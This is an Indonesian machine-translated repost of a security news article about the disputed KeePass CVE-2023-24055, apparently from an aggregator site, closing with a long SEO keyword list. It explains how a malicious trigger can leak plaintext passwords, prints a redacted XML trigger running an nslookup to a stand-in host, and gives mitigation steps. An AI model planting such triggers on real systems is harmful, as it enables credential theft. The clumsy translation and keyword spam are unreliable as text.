Sudah beberapa minggu yang layak diberitakan untuk pengelola kata sandi – utilitas praktis yang membantu Anda membuat kata sandi berbeda untuk setiap situs web yang Anda gunakan, dan kemudian melacak semuanya.
Pada akhir tahun 2022, giliran LastPass menjadi berita, ketika perusahaan akhirnya mengakui bahwa pelanggaran yang dialaminya pada Agustus 2022 memang berakhir dengan kata sandi pelanggan. brankas dicuri dari layanan cloud tempat mereka dicadangkan.
(Kata sandi itu sendiri tidak dicuri, karena brankas dienkripsi, dan LastPass tidak memiliki salinan "kunci master" siapa pun untuk file brankas cadangan itu sendiri, tetapi itu lebih dekat daripada yang senang didengar kebanyakan orang.)
Kemudian giliran LifeLock menjadi berita, ketika perusahaan memperingatkan tentang apa yang tampak seperti ruam serangan menebak kata sandi, mungkin berdasarkan kata sandi yang dicuri dari situs web yang sama sekali berbeda, mungkin beberapa waktu lalu, dan mungkin dibeli di web gelap baru-baru ini.
LifeLock sendiri belum dibobol, tetapi beberapa penggunanya pernah, berkat perilaku berbagi kata sandi yang disebabkan oleh risiko yang mungkin tidak mereka ingat pernah mereka ambil.
Pesaing 1Password dan BitWarden juga telah menjadi berita baru-baru ini, berdasarkan laporan iklan jahat, yang tampaknya tanpa disadari ditayangkan oleh Google, yang secara meyakinkan memikat pengguna untuk mereplikasi halaman masuk yang bertujuan untuk mem-phishing detail akun mereka.
Sekarang giliran KeePass dalam berita, kali ini untuk masalah keamanan siber lainnya: dugaan kerentanan, istilah jargon yang digunakan untuk bug perangkat lunak yang mengarah ke lubang keamanan siber yang mungkin dapat dieksploitasi oleh penyerang untuk tujuan jahat.
Mengendus kata sandi menjadi mudah
Kami menyebutnya sebagai kerentanan di sini karena memang memiliki pengidentifikasi bug resmi, yang dikeluarkan oleh Institut Standar dan Teknologi Nasional AS.
Bug telah di-dubbing CVE-2023-24055: Penyerang yang memiliki akses tulis ke file konfigurasi XML [dapat] mendapatkan kata sandi teks-jelas dengan menambahkan pemicu ekspor.
Klaim tentang bisa mendapatkan kata sandi teks-jelas, sayangnya, benar.
Jika saya memiliki akses tulis ke file pribadi Anda, termasuk yang Anda sebut %APPDATA%
direktori, saya dapat dengan diam-diam men-tweak bagian konfigurasi untuk mengubah pengaturan KeePass apa pun yang telah Anda sesuaikan, atau untuk menambahkan penyesuaian jika Anda tidak mengubah apa pun secara sadar…
…dan secara mengejutkan saya dapat dengan mudah mencuri kata sandi teks biasa Anda, baik secara massal, misalnya dengan membuang seluruh database sebagai file CSV yang tidak terenkripsi, atau saat Anda menggunakannya, misalnya dengan menyetel "pengait program" yang memicu setiap kali Anda mengakses kata sandi dari database.
Perhatikan bahwa saya tidak perlu administrator hak istimewa, karena saya tidak perlu mengotak-atik direktori instalasi sebenarnya tempat aplikasi KeePass disimpan, yang biasanya terlarang bagi pengguna biasa
Dan saya tidak memerlukan akses ke pengaturan konfigurasi global yang terkunci.
Menariknya, KeePass berusaha keras untuk menghentikan kata sandi Anda diendus saat Anda menggunakannya, termasuk menggunakan teknik perlindungan tamper untuk menghentikan berbagai trik anti-keylogger bahkan dari pengguna yang sudah memiliki kekuatan sysadmin.
Tetapi perangkat lunak KeePass juga membuatnya sangat mudah untuk menangkap data kata sandi teks biasa, mungkin dengan cara yang mungkin Anda anggap "terlalu mudah", bahkan untuk non-administrator.
Itu adalah pekerjaan satu menit untuk menggunakan GUI KeePass untuk membuat Pelatuk acara untuk dijalankan setiap kali Anda menyalin kata sandi ke clipboard, dan untuk mengatur acara itu untuk melakukan pencarian DNS yang menyertakan nama pengguna dan kata sandi teks biasa yang dimaksud:
Kami kemudian dapat menyalin pengaturan XML yang tidak terlalu jelas untuk opsi itu dari file konfigurasi lokal kami sendiri ke file konfigurasi pengguna lain di sistem, setelah itu mereka juga akan menemukan kata sandi mereka bocor melalui internet melalui pencarian DNS.
Meskipun sebagian besar data konfigurasi XML dapat dibaca dan informatif, KeePass menggunakan string data acak yang dikenal sebagai GUID (kependekan dari pengidentifikasi unik global) untuk menunjukkan berbagai Pelatuk pengaturan, sehingga bahkan pengguna yang berpengetahuan luas akan membutuhkan daftar referensi yang luas untuk memahami pemicu mana yang ditetapkan, dan bagaimana caranya.
Inilah yang terlihat seperti pemicu kebocoran DNS kami, meskipun kami menyunting beberapa detail sehingga Anda tidak dapat langsung melakukan kesalahan hanya dengan menyalin dan menempelkan teks ini secara langsung:
XXXXXXXXXXXXXXXXXXX Salinan Curi barang melalui pencarian DNS XXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXX.bla.test BENAR 1
Dengan pemicu ini aktif, mengakses kata sandi KeePass menyebabkan teks biasa bocor dalam pencarian DNS yang tidak mencolok ke domain pilihan saya, yaitu blah.test
dalam contoh ini.
Perhatikan bahwa penyerang di kehidupan nyata hampir pasti akan mengacak atau mengaburkan teks yang dicuri, yang tidak hanya membuat lebih sulit dikenali saat kebocoran DNS terjadi, tetapi juga menjaga kata sandi yang berisi karakter non-ASCII, seperti huruf beraksen atau emoji, yang tidak dapat digunakan dalam nama DNS:
Tapi apakah itu benar-benar bug?
Pertanyaan yang sulit, bagaimanapun, adalah, "Apakah ini benar-benar bug, atau hanya fitur canggih yang dapat disalahgunakan oleh seseorang yang sudah membutuhkan setidaknya kendali atas file pribadi Anda sebanyak yang Anda miliki?"
Sederhananya, apakah itu kerentanan jika seseorang yang sudah memiliki kendali atas akun Anda dapat mengacaukan file yang seharusnya dapat diakses oleh akun Anda?
Meskipun Anda mungkin berharap bahwa pengelola pssword akan menyertakan banyak lapisan tambahan perlindungan kerusakan untuk mempersulit bug/fitur semacam ini untuk disalahgunakan, sebaiknya CVE-2023-24055 benar-benar merupakan kerentanan yang terdaftar di CVE?
Jika demikian, bukankah perintah seperti DEL
(menghapus file) dan FORMAT
perlu "bug", juga?
Dan bukankah keberadaan PowerShell, yang membuat perilaku yang berpotensi berbahaya menjadi lebih mudah untuk diprovokasi (coba powerhsell get-clipboard
, misalnya), menjadi kerentanan tersendiri?
Itulah posisi KeePass, diakui oleh teks berikut yang telah ditambahkan ke detail "bug". di situs web NIST:
** DISPUTED ** […] CATATAN: posisi vendor adalah bahwa basis data kata sandi tidak dimaksudkan untuk keamanan terhadap penyerang yang memiliki tingkat akses tersebut ke PC lokal.
Apa yang harus dilakukan?
Jika Anda adalah pengguna KeePass mandiri, Anda dapat memeriksa Pemicu jahat seperti "DNS Stealer" yang kami buat di atas dengan membuka aplikasi KeePass dan membaca dengan teliti Tools > Pemicu… window:
Perhatikan bahwa Anda dapat mengubah keseluruhan Pelatuk sistem off dari jendela ini, hanya dengan deslecting [ ] Enable trigger system
pilihan…
…tetapi itu bukan pengaturan global, sehingga dapat diaktifkan kembali melalui file konfigurasi lokal Anda, dan karena itu hanya melindungi Anda dari kesalahan, bukan dari penyerang yang memiliki akses ke akun Anda.
Anda dapat menonaktifkan opsi untuk semua orang di komputer, tanpa opsi bagi mereka untuk mengaktifkannya sendiri, dengan memodifikasi file "lockdown" global KeePass.config.enforced.XML
, ditemukan di direktori tempat program aplikasi itu sendiri diinstal.
Pemicu akan dimatikan secara paksa untuk semua orang jika file pemberlakuan XML global Anda terlihat seperti ini:
Salah
(Jika Anda bertanya-tanya, penyerang yang memiliki akses tulis ke direktori aplikasi untuk membalikkan perubahan ini hampir pasti memiliki kekuatan tingkat sistem yang cukup untuk memodifikasi file yang dapat dieksekusi KeePass itu sendiri, atau untuk menginstal dan mengaktifkan keylogger mandiri.)
Jika Anda seorang administrator jaringan yang bertugas mengunci KeePass di komputer pengguna Anda sehingga masih cukup fleksibel untuk membantu mereka, tetapi tidak cukup fleksibel bagi mereka untuk membantu penjahat dunia maya secara tidak sengaja, kami sarankan untuk membaca KeePass Masalah keamanan halaman, halaman pemicu halaman, dan Konfigurasi yang Dipaksakan .
- Konten Bertenaga SEO & Distribusi PR. Dapatkan Amplifikasi Hari Ini.
- Platoblockchain. Intelijen Metaverse Web3. Pengetahuan Diperkuat. Akses Di Sini.
- Sumber: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- Sanggup
- Tentang Kami
- atas
- Mutlak
- mengakses
- mengakses
- Akun
- aktif
- menambahkan
- mengaku
- iklan
- Setelah
- terhadap
- Semua
- diduga
- sudah
- dan
- Lain
- aplikasi
- Aplikasi
- Agustus
- penulis
- mobil
- kembali
- bersandaran
- background-image
- backup
- berdasarkan
- karena
- makhluk
- batas
- Bawah
- pelanggaran
- Bug
- bug
- menangkap
- yang
- kasus
- disebabkan
- penyebab
- pusat
- Pasti
- perubahan
- karakter
- memeriksa
- pilihan
- klaim
- lebih dekat
- awan
- warna
- bagaimana
- perusahaan
- sama sekali
- komputer
- komputer
- Kondisi
- konfigurasi
- Mempertimbangkan
- kontrol
- salinan
- bisa
- menutupi
- membuat
- dibuat
- cve
- penjahat cyber
- Keamanan cyber
- Berbahaya
- gelap
- Web Gelap
- data
- Basis Data
- rincian
- MELAKUKAN
- berbeda
- langsung
- Display
- dns
- domain
- Dont
- turun
- dijuluki
- mudah
- mudah
- antara
- terenkripsi
- pelaksanaan
- cukup
- Seluruh
- Bahkan
- Acara
- Setiap
- semua orang
- contoh
- Mengeksploitasi
- ekspor
- luas
- tambahan
- Fitur
- beberapa
- File
- File
- Akhirnya
- Menemukan
- fleksibel
- berikut
- kekuatan
- ditemukan
- dari
- mendapatkan
- mendapatkan
- Aksi
- Pergi
- berguna
- senang
- memiliki
- tinggi
- membantu
- di sini
- Lubang
- berharap
- melayang-layang
- Seterpercayaapakah Olymp Trade? Kesimpulan
- Namun
- HTML
- HTTPS
- identifier
- Segera
- in
- memasukkan
- termasuk
- Termasuk
- informatif
- install
- contoh
- Lembaga
- Internet
- isu
- Ditempatkan
- IT
- Diri
- jargon
- Menjaga
- dikenal
- sebagian besar
- LastPass
- lapisan
- memimpin
- bocor
- kebocoran
- Tingkat
- Daftar
- lokal
- tampak
- TERLIHAT
- lookup
- terbuat
- membuat
- MEMBUAT
- manajer
- Manajer
- Margin
- max-width
- mungkin
- kesalahan
- kesalahan
- memodifikasi
- paling
- nama
- nasional
- Perlu
- jaringan
- berita
- nisan
- normal
- memperoleh
- resmi
- pembukaan
- pilihan
- jika tidak
- sendiri
- parameter
- Kata Sandi
- password
- paul
- PC
- Konsultan Ahli
- mungkin
- pribadi
- Phishing
- Teks biasa
- plato
- Kecerdasan Data Plato
- Data Plato
- posisi
- Posts
- berpotensi
- kekuasaan
- kuat
- kekuatan
- PowerShell
- swasta
- hak
- mungkin
- program
- dibeli
- tujuan
- menempatkan
- pertanyaan
- acak
- ruam
- Bacaan
- baru-baru ini
- sarankan
- reguler
- ingat
- menjawab
- Dilaporkan
- laporan
- membalikkan
- risiko
- Run
- Bagian
- aman
- rasa
- layanan
- set
- pengaturan
- pengaturan
- Pendek
- harus
- hanya
- So
- Perangkat lunak
- padat
- beberapa
- Seseorang
- Spot
- standalone
- standar
- Masih
- dicuri
- berhenti
- tersimpan
- seperti itu
- Seharusnya
- SVG
- sistem
- Mengambil
- teknik
- Teknologi
- Grafik
- mereka
- diri
- karena itu
- Melalui
- waktu
- untuk
- terlalu
- puncak
- jalur
- transisi
- jelas
- memicu
- benar
- MENGHIDUPKAN
- Berbalik
- khas
- unik
- URL
- us
- menggunakan
- Pengguna
- Pengguna
- keperluan
- berbagai
- Kubah
- kubah
- melalui
- kerentanan
- W3
- cara
- jaringan
- Situs Web
- minggu
- Apa
- yang
- SIAPA
- akan
- tanya
- Kerja
- akan
- menulis
- XML
- Anda
- diri
- zephyrnet.dll